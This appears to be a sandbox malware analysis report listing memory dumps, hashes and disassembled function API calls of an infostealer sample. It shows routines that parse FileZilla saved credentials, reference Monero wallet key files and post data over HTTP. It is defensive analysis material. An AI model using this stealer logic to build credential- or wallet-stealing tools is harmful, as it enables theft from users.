                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                            • Instruction ID: 19d487a3a54cc3ffd0704c7b8ff301de05b3163ce63fcb16e80afecb80cfcd13
                            • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                            • Instruction Fuzzy Hash: F3514C62E09BD985C7058B7544502EEBFB21FE6214F2E829EC4982F383C3759689D3E5
                            Function 0134CFFA Relevance: .1, Instructions: 79COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4eea5a1221997257fccfb423d03184ade5bc852d13fd38deb10f853b0c973a28
                            • Instruction ID: a32159bec11f4fdcd9a8c18449fa92bfbf3a0cd35be06591635b69aa653d0a6b
                            • Opcode Fuzzy Hash: 4eea5a1221997257fccfb423d03184ade5bc852d13fd38deb10f853b0c973a28
                            • Instruction Fuzzy Hash: A321F5B251C6149FE311BF29D881AAEFBE4FF58360F06482DEAD893610D7319840CB97
                            Function 00E875A8 Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                            • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                            • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                            • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                            Function 00E59AA0 Relevance: .0, Instructions: 15COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            Function 00E503B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E58F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58F9B
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E4A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E4A13C
                              • Part of subcall function 00E4A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E4A161
                              • Part of subcall function 00E4A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E4A181
                              • Part of subcall function 00E4A110: ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E4A1AA
                              • Part of subcall function 00E4A110: LocalFree.KERNEL32(00E4148F), ref: 00E4A1E0
                              • Part of subcall function 00E4A110: CloseHandle.KERNEL32(000000FF), ref: 00E4A1EA
                              • Part of subcall function 00E58FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58FE2
                            • GetProcessHeap.KERNEL32(00000000,000F423F,00E60DBF,00E60DBE,00E60DBB,00E60DBA), ref: 00E504C2
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E504C9
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00E504E5
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E504F3
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 00E5052F
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E5053D
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00E50579
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E50587
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00E505C3
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E505D5
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E50662
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E5067A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E50692
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E506AA
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00E506C2
                            • lstrcat.KERNEL32(?,profile: null), ref: 00E506D1
                            • lstrcat.KERNEL32(?,url: ), ref: 00E506E0
                            • lstrcat.KERNEL32(?,00000000), ref: 00E506F3
                            • lstrcat.KERNEL32(?,00E61770), ref: 00E50702
                            • lstrcat.KERNEL32(?,00000000), ref: 00E50715
                            • lstrcat.KERNEL32(?,00E61774), ref: 00E50724
                            • lstrcat.KERNEL32(?,login: ), ref: 00E50733
                            • lstrcat.KERNEL32(?,00000000), ref: 00E50746
                            • lstrcat.KERNEL32(?,00E61780), ref: 00E50755
                            • lstrcat.KERNEL32(?,password: ), ref: 00E50764
                            • lstrcat.KERNEL32(?,00000000), ref: 00E50777
                            • lstrcat.KERNEL32(?,00E61790), ref: 00E50786
                            • lstrcat.KERNEL32(?,00E61794), ref: 00E50795
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E60DB7), ref: 00E507EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: 239f1bbdf5817101e80f3d31c518eb36fa1b07cd4055e89a410662defad18a22
                            • Instruction ID: 4c29559f9543c4e6401700b3c26b0c9e84426df15143cfc08879e5291001f456
                            • Opcode Fuzzy Hash: 239f1bbdf5817101e80f3d31c518eb36fa1b07cd4055e89a410662defad18a22
                            • Instruction Fuzzy Hash: 58D17271940208ABCB04FBF0DD56EEEB379AF14302F049A64F512B7195EF70AA49CB61
                            Function 00E459B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E44800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44889
                              • Part of subcall function 00E44800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44899
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E45A48
                            • StrCmpCA.SHLWAPI(?,009CF3B0), ref: 00E45A63
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E45BE3
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,009CF2D0,00000000,?,009CB020,00000000,?,00E61B4C), ref: 00E45EC1
                            • lstrlen.KERNEL32(00000000), ref: 00E45ED2
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00E45EE3
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E45EEA
                            • lstrlen.KERNEL32(00000000), ref: 00E45EFF
                            • lstrlen.KERNEL32(00000000), ref: 00E45F28
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E45F41
                            • lstrlen.KERNEL32(00000000,?,?), ref: 00E45F6B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E45F7F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00E45F9C
                            • InternetCloseHandle.WININET(00000000), ref: 00E46000
                            • InternetCloseHandle.WININET(00000000), ref: 00E4600D
                            • HttpOpenRequestA.WININET(00000000,009CF2F0,?,009CE8D8,00000000,00000000,00400100,00000000), ref: 00E45C48
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                            • InternetCloseHandle.WININET(00000000), ref: 00E46017
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: 174b45065b86c394c842944d91dbcf9007fd03b9681ddd9d22a51d887240f311
                            • Instruction ID: 166ee2752dc1bf5b161c447d20856d86620b3332e90e3bfde430805d1e9d9a6a
                            • Opcode Fuzzy Hash: 174b45065b86c394c842944d91dbcf9007fd03b9681ddd9d22a51d887240f311
                            • Instruction Fuzzy Hash: 49123171920118ABCB15EBA0DDA5FEEB3B9BF14701F045AA9F50672191EF702A4CCF91
                            Function 00E4CFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E58CF0: GetSystemTime.KERNEL32(00E60E1B,009CB1A0,00E605B6,?,?,00E413F9,?,0000001A,00E60E1B,00000000,?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E58D16
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E4D083
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E4D1C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E4D1CE
                            • lstrcat.KERNEL32(?,00000000), ref: 00E4D308
                            • lstrcat.KERNEL32(?,00E61570), ref: 00E4D317
                            • lstrcat.KERNEL32(?,00000000), ref: 00E4D32A
                            • lstrcat.KERNEL32(?,00E61574), ref: 00E4D339
                            • lstrcat.KERNEL32(?,00000000), ref: 00E4D34C
                            • lstrcat.KERNEL32(?,00E61578), ref: 00E4D35B
                            • lstrcat.KERNEL32(?,00000000), ref: 00E4D36E
                            • lstrcat.KERNEL32(?,00E6157C), ref: 00E4D37D
                            • lstrcat.KERNEL32(?,00000000), ref: 00E4D390
                            • lstrcat.KERNEL32(?,00E61580), ref: 00E4D39F
                            • lstrcat.KERNEL32(?,00000000), ref: 00E4D3B2
                            • lstrcat.KERNEL32(?,00E61584), ref: 00E4D3C1
                            • lstrcat.KERNEL32(?,00000000), ref: 00E4D3D4
                            • lstrcat.KERNEL32(?,00E61588), ref: 00E4D3E3
                              • Part of subcall function 00E5AB30: lstrlen.KERNEL32(UO,?,?,00E44F55,00E60DDF), ref: 00E5AB3B
                              • Part of subcall function 00E5AB30: lstrcpy.KERNEL32(00E60DDF,00000000), ref: 00E5AB95
                            • lstrlen.KERNEL32(?), ref: 00E4D42A
                            • lstrlen.KERNEL32(?), ref: 00E4D439
                              • Part of subcall function 00E5AD80: StrCmpCA.SHLWAPI(00000000,00E61568,00E4D2A2,00E61568,00000000), ref: 00E5AD9F
                            • DeleteFileA.KERNEL32(00000000), ref: 00E4D4B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: 27fde6c79773d5dcf6302f3695dacdeb591b9c1a3062d4bb1810b00e36d82884
                            • Instruction ID: 40fb0928f17d7b33d985c2026b9adf16d59a0ff61a819afe8d615642a9a1ab1c
                            • Opcode Fuzzy Hash: 27fde6c79773d5dcf6302f3695dacdeb591b9c1a3062d4bb1810b00e36d82884
                            • Instruction Fuzzy Hash: 3BE14271950108ABCB18FBA0DD56EEEB3B9AF14302F045AB4F51776191DF31AA4CCB62
                            Function 00E4CA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,009CDB08,00000000,?,00E61544,00000000,?,?), ref: 00E4CB6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00E4CB89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00E4CB95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E4CBA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00E4CBD9
                            • StrStrA.SHLWAPI(?,009CDB38,00E60B56), ref: 00E4CBF7
                            • StrStrA.SHLWAPI(00000000,009CDC58), ref: 00E4CC1E
                            • StrStrA.SHLWAPI(?,009CE378,00000000,?,00E61550,00000000,?,00000000,00000000,?,009C9878,00000000,?,00E6154C,00000000,?), ref: 00E4CDA2
                            • StrStrA.SHLWAPI(00000000,009CE678), ref: 00E4CDB9
                              • Part of subcall function 00E4C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E4C971
                              • Part of subcall function 00E4C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E4C97C
                            • StrStrA.SHLWAPI(?,009CE678,00000000,?,00E61554,00000000,?,00000000,009C96E8), ref: 00E4CE5A
                            • StrStrA.SHLWAPI(00000000,009C9978), ref: 00E4CE71
                              • Part of subcall function 00E4C920: lstrcat.KERNEL32(?,00E60B47), ref: 00E4CA43
